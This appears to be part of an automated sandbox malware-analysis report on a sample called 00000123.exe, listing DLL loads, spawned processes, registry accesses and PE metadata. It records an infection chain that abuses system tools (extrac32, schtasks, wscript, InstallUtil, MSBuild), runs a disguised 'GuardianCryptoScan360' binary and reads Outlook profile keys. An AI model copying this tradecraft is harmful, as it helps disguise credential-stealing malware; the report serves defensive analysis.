                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: napinsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: wshbth.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: winrnr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: napinsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pnrpnsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wshbth.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winrnr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\00000123.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Users\user\Desktop\00000123.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\00000123.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 00000123.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 00000123.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: 00000123.exeStatic file information: File size 3520000 > 1048576
                  Source: 00000123.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x35ac00
                  Source: 00000123.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbW source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016A1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 00000123.exe, 00000000.00000002.2572492480.0000000008420000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: ((.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016A1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 00000123.exe, 00000000.00000002.2572492480.0000000008420000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: n8C:\Windows\InstallUtil.pdb` source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb_NP* source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbiNF* source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbl$ source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdba source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
